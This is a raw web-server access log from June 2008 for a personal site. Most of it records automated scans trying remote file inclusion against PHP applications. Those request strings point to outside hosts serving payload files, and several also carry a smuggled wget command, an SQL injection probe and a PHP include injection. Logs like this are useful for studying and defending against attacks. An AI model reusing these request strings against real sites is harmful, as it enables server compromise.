67.195.37.180 - - [08/Jun/2008:09:00:22 -0700] "GET /logs/access.log HTTP/1.0" 200 3330630 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.29.83.181 - - [08/Jun/2008:09:00:39 -0700] "GET /logs/access_080312.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://musicampus.net/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.83.181 - - [08/Jun/2008:09:00:39 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://musicampus.net/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.83.181 - - [08/Jun/2008:09:00:39 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://musicampus.net/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.98.140.99 - - [08/Jun/2008:09:00:58 -0700] "GET /logs/port.php?content=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.140.99 - - [08/Jun/2008:09:00:58 -0700] "GET /port.php?content=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.140.99 - - [08/Jun/2008:09:01:01 -0700] "GET /logs/access_080215.log/port.php?content=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.140.99 - - [08/Jun/2008:09:01:01 -0700] "GET /port.php?content=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.140.99 - - [08/Jun/2008:09:01:01 -0700] "GET /logs/port.php?content=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.140.99 - - [08/Jun/2008:09:01:02 -0700] "GET /logs/port.php?content=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.140.99 - - [08/Jun/2008:09:01:02 -0700] "GET /port.php?content=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.140.99 - - [08/Jun/2008:09:01:03 -0700] "GET /logs/access_080215.log/port.php?content=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.140.99 - - [08/Jun/2008:09:01:03 -0700] "GET /port.php?content=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.140.99 - - [08/Jun/2008:09:01:03 -0700] "GET /logs/port.php?content=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.140.99 - - [08/Jun/2008:09:01:22 -0700] "GET /logs/access.log/port.php?content=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.140.99 - - [08/Jun/2008:09:01:25 -0700] "GET /logs/access.log/port.php?content=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
205.234.253.134 - - [08/Jun/2008:09:02:29 -0700] "GET //playing.php?commonpath=http://dannaoui.com/Mambo/images/img/test?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
205.234.253.134 - - [08/Jun/2008:09:02:29 -0700] "GET /logs//playing.php?commonpath=http://dannaoui.com/Mambo/images/img/test?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
64.90.163.98 - - [08/Jun/2008:09:03:37 -0700] "GET /logs/access_080118.log//errors.php?error=http://www.pescandoconmosca.cl//images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.129.21 - - [08/Jun/2008:09:03:44 -0700] "GET /logs/access_080201.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://europe-souvenirs.com/shop/templates_c/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.129.21 - - [08/Jun/2008:09:03:44 -0700] "GET /logs/access_080312.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://europe-souvenirs.com/shop/templates_c/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.232.11.93 - - [08/Jun/2008:09:03:51 -0700] "GET /logs/access_080421.log/config/dbutil.bck.php?confdir=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.232.11.93 - - [08/Jun/2008:09:03:53 -0700] "GET /logs/access_080421.log/config/dbutil.bck.php?confdir=http://www.holidayinfos.com/4images/data/media/666? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.128.131.80 - - [08/Jun/2008:09:04:10 -0700] "GET /logs/index1.php?x=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.128.131.80 - - [08/Jun/2008:09:04:10 -0700] "GET /index1.php?x=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.53.197.2 - - [08/Jun/2008:09:04:31 -0700] "GET /logs/access_080121.log//components/com_simpleboard/image_upload.php?sbp=http://khenifrati.free.fr//modules/tinycontent/admin/spaw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [08/Jun/2008:09:04:31 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://khenifrati.free.fr//modules/tinycontent/admin/spaw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [08/Jun/2008:09:04:31 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://khenifrati.free.fr//modules/tinycontent/admin/spaw/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.16.18 - - [08/Jun/2008:09:04:38 -0700] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://www.safonov.sumy.ua/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
151.11.24.250 - - [08/Jun/2008:09:05:32 -0700] "GET /logs//html&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.whitegreyblackhat.com/recommended/dotcomincome/mambo.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
70.84.182.98 - - [08/Jun/2008:09:05:57 -0700] "GET //playing.php?commonpath=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.56.189.33 - - [08/Jun/2008:09:06:34 -0700] "GET /logs/access_080421.log/config/dbutil.bck.php?confdir=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.182.98 - - [08/Jun/2008:09:06:46 -0700] "GET //playing.php?commonpath=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.137.18 - - [08/Jun/2008:09:07:01 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.trobur.no/media/bbs?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.137.18 - - [08/Jun/2008:09:07:01 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.trobur.no/media/bbs?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.90.163.98 - - [08/Jun/2008:09:07:46 -0700] "GET /logs/access_080312.log//errors.php?error=http://www.pescandoconmosca.cl//images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.182.98 - - [08/Jun/2008:09:08:00 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [08/Jun/2008:09:08:07 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.157.211.204 - - [08/Jun/2008:09:08:22 -0700] "GET /logs/access_080429.log//tools/send_reminders.php?noSet=0&includedir=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.157.211.204 - - [08/Jun/2008:09:08:23 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.157.211.204 - - [08/Jun/2008:09:08:23 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.56.189.33 - - [08/Jun/2008:09:08:35 -0700] "GET /logs/access_080421.log/config/dbutil.bck.php?confdir=http://www.holidayinfos.com/4images/data/media/666? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.56.189.33 - - [08/Jun/2008:09:08:39 -0700] "GET /logs/access_080421.log/config/dbutil.bck.php?confdir=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.128.131.80 - - [08/Jun/2008:09:09:16 -0700] "GET /logs/home.php?x=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.128.131.80 - - [08/Jun/2008:09:09:16 -0700] "GET /home.php?x=http://www.freelance.eu/graphics/robot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.84.182.98 - - [08/Jun/2008:09:09:40 -0700] "GET //playing.php?commonpath=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [08/Jun/2008:09:09:40 -0700] "GET //playing.php?commonpath=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
189.25.9.174 - - [08/Jun/2008:09:09:59 -0700] "GET /logs/access_071220.log+and+(select+count(*)+from+redeye) HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV2" "www.dmulk.com"
203.237.226.64 - - [08/Jun/2008:09:11:08 -0700] "GET //playing.php?commonpath=http://dannaoui.com/Mambo/images/img/test?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
203.237.226.64 - - [08/Jun/2008:09:11:08 -0700] "GET /logs//playing.php?commonpath=http://dannaoui.com/Mambo/images/img/test?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
193.232.11.93 - - [08/Jun/2008:09:11:10 -0700] "GET /logs/access_080429.log/config/dbutil.bck.php?confdir=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.53.137.18 - - [08/Jun/2008:09:11:51 -0700] "GET /logs/access_080106.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.trobur.no/media/bbs?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.221.143.111 - - [08/Jun/2008:09:11:55 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.185.237.137 - - [08/Jun/2008:09:12:05 -0700] "GET /logs//include.php?path[docroot]=http://pwd.roietceo.net/Newsimage/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.185.237.137 - - [08/Jun/2008:09:12:06 -0700] "GET //include.php?path[docroot]=http://pwd.roietceo.net/Newsimage/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.98.184.24 - - [08/Jun/2008:09:12:19 -0700] "GET //playing.php?commonpath=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:12:31 -0700] "GET /bikes/dteel/2008-05-30/IMG_4646M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "www.dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:13:26 -0700] "GET /bikes/dteel/2008-05-30/IMG_4646.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "www.dmulk.com"
189.25.9.174 - - [08/Jun/2008:09:13:27 -0700] "GET /logs/access_071223.log+and+(select+count(*)+from+redeye) HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV2" "www.dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:13:42 -0700] "GET /bikes/dteel/2008-05-30/IMG_4646.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "www.dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:13:49 -0700] "GET /bikes/dteel/2008-05-30/IMG_4646.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "www.dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:13:59 -0700] "GET /bikes/dteel/2008-05-30/ HTTP/1.1" 200 6027 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "www.dmulk.com"
219.94.129.31 - - [08/Jun/2008:09:14:02 -0700] "GET /logs//include.php?path[docroot]=http://pwd.roietceo.net/Newsimage/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.129.31 - - [08/Jun/2008:09:14:03 -0700] "GET //include.php?path[docroot]=http://pwd.roietceo.net/Newsimage/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.25.155.27 - - [08/Jun/2008:09:14:12 -0700] "GET /logs/access_080312.log/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:14:19 -0700] "GET /bikes/dteel/2008-05-30/IMG_4646M.JPG HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "www.dmulk.com"
71.136.40.7 - - [08/Jun/2008:09:14:39 -0700] "GET /bikes/dteel/2008-05-30/IMG_4646.JPG HTTP/1.1" 304 - "http://www.dmulk.com/bikes/dteel/2008-05-30/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WWTClient2)" "www.dmulk.com"
78.110.50.106 - - [08/Jun/2008:09:15:10 -0700] "GET //install/install3.php?database=none&cabsolute_path=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
78.110.50.106 - - [08/Jun/2008:09:15:10 -0700] "GET /logs//install/install3.php?database=none&cabsolute_path=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
80.249.116.19 - - [08/Jun/2008:09:16:05 -0700] "GET /logs/access_080118.log/classes/core/language.php?rootdir=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.249.116.19 - - [08/Jun/2008:09:16:05 -0700] "GET /logs/classes/core/language.php?rootdir=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.249.116.19 - - [08/Jun/2008:09:16:05 -0700] "GET /classes/core/language.php?rootdir=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [08/Jun/2008:09:16:37 -0700] "GET /logs/access.log//modules/Forums/errors.php?error=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [08/Jun/2008:09:16:37 -0700] "GET //modules/Forums/errors.php?error=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [08/Jun/2008:09:16:38 -0700] "GET /logs//modules/Forums/errors.php?error=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.201.218.158 - - [08/Jun/2008:09:16:56 -0700] "GET /logs/access_071218.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=wget%20http://hrpc.net/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.201.218.158 - - [08/Jun/2008:09:16:59 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=wget%20http://hrpc.net/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.83.181 - - [08/Jun/2008:09:17:00 -0700] "GET /logs/access_080221.log//install/install3.php?database=none&cabsolute_path=http://musicampus.net/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.83.181 - - [08/Jun/2008:09:17:01 -0700] "GET //install/install3.php?database=none&cabsolute_path=http://musicampus.net/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.83.181 - - [08/Jun/2008:09:17:01 -0700] "GET /logs//install/install3.php?database=none&cabsolute_path=http://musicampus.net/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.98.184.24 - - [08/Jun/2008:09:17:01 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.201.218.158 - - [08/Jun/2008:09:17:03 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=wget%20http://hrpc.net/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.225.171.182 - - [08/Jun/2008:09:17:41 -0700] "GET /logs/access_080209.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.chonil.co.kr/zboard/icon/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.225.171.182 - - [08/Jun/2008:09:17:41 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.chonil.co.kr/zboard/icon/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.225.171.182 - - [08/Jun/2008:09:17:41 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.chonil.co.kr/zboard/icon/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.57.142.40 - - [08/Jun/2008:09:17:51 -0700] "GET /logs/access_080204.log//index.php?option=com_gameq&task=page&category_id=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.57.142.40 - - [08/Jun/2008:09:17:55 -0700] "GET //index.php?option=com_gameq&task=page&category_id=http://www.injoyusa.com/on.txt??? HTTP/1.1" 200 16904 "-" "libwww-perl/5.810" "www.dmulk.com"
69.57.142.40 - - [08/Jun/2008:09:17:55 -0700] "GET /logs//index.php?option=com_gameq&task=page&category_id=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.83.181 - - [08/Jun/2008:09:18:04 -0700] "GET /logs/access_080117.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://musicampus.net/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.113.151.18 - - [08/Jun/2008:09:18:05 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.monstrengo.com/m_pictures/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
208.113.151.18 - - [08/Jun/2008:09:18:05 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.monstrengo.com/m_pictures/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
205.234.219.245 - - [08/Jun/2008:09:18:40 -0700] "GET /logs/access_080204.log//index.php?option=com_gameq&task=page&category_id=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.219.245 - - [08/Jun/2008:09:18:40 -0700] "GET /logs/access_080204.log//index.php?option=com_gameq&task=page&category_id=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.219.245 - - [08/Jun/2008:09:18:40 -0700] "GET /logs/access_080204.log//index.php?option=com_gameq&task=page&category_id=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.219.245 - - [08/Jun/2008:09:18:43 -0700] "GET //index.php?option=com_gameq&task=page&category_id=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 200 16936 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.219.245 - - [08/Jun/2008:09:18:43 -0700] "GET //index.php?option=com_gameq&task=page&category_id=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 200 16936 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.219.245 - - [08/Jun/2008:09:18:43 -0700] "GET /logs//index.php?option=com_gameq&task=page&category_id=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.219.245 - - [08/Jun/2008:09:18:43 -0700] "GET /logs//index.php?option=com_gameq&task=page&category_id=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.219.245 - - [08/Jun/2008:09:18:45 -0700] "GET /logs//index.php?option=com_gameq&task=page&category_id=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.219.245 - - [08/Jun/2008:09:18:45 -0700] "GET //index.php?option=com_gameq&task=page&category_id=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 200 16936 "-" "libwww-perl/5.805" "www.dmulk.com"
80.177.187.23 - - [08/Jun/2008:09:18:49 -0700] "GET /logs/access_080215.log/index.php?p=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.177.187.23 - - [08/Jun/2008:09:18:52 -0700] "GET /index.php?p=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 200 16812 "-" "libwww-perl/5.805" "www.dmulk.com"
80.177.187.23 - - [08/Jun/2008:09:18:53 -0700] "GET /logs/index.php?p=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.90.163.98 - - [08/Jun/2008:09:19:08 -0700] "GET /logs/access_080429.log//errors.php?error=http://www.pescandoconmosca.cl//images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.98.140.99 - - [08/Jun/2008:09:19:08 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.140.99 - - [08/Jun/2008:09:19:09 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.140.99 - - [08/Jun/2008:09:19:09 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.140.99 - - [08/Jun/2008:09:19:11 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.140.99 - - [08/Jun/2008:09:19:11 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.140.99 - - [08/Jun/2008:09:19:11 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://moshow.co.il/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.7.108.240 - - [08/Jun/2008:09:19:13 -0700] "GET /logs/index.php?redir=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.7.108.240 - - [08/Jun/2008:09:19:15 -0700] "GET /index.php?redir=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 200 16852 "-" "libwww-perl/5.805" "www.dmulk.com"
66.230.197.245 - - [08/Jun/2008:09:19:16 -0700] "GET /logs/access_080204.log//index.php?option=com_gameq&task=page&category_id=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [08/Jun/2008:09:19:18 -0700] "GET //index.php?option=com_gameq&task=page&category_id=http://www.injoyusa.com/on.txt??? HTTP/1.1" 200 16904 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [08/Jun/2008:09:19:18 -0700] "GET /logs//index.php?option=com_gameq&task=page&category_id=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.86.5.10 - - [08/Jun/2008:09:19:32 -0700] "GET /index.php?redir=http://sobangnara.com/board/data/.init/est.txt??? HTTP/1.1" 200 16864 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
70.86.5.10 - - [08/Jun/2008:09:19:37 -0700] "GET /logs/index.php?redir=http://sobangnara.com/board/data/.init/est.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
66.6.223.160 - - [08/Jun/2008:09:20:09 -0700] "GET /logs/access_080204.log//index.php?option=com_gameq&task=page&category_id=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.6.223.160 - - [08/Jun/2008:09:20:14 -0700] "GET /logs//index.php?option=com_gameq&task=page&category_id=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.3.241.218 - - [08/Jun/2008:09:20:18 -0700] "GET /blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/ HTTP/1.1" 200 8517 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "dmulk.com"
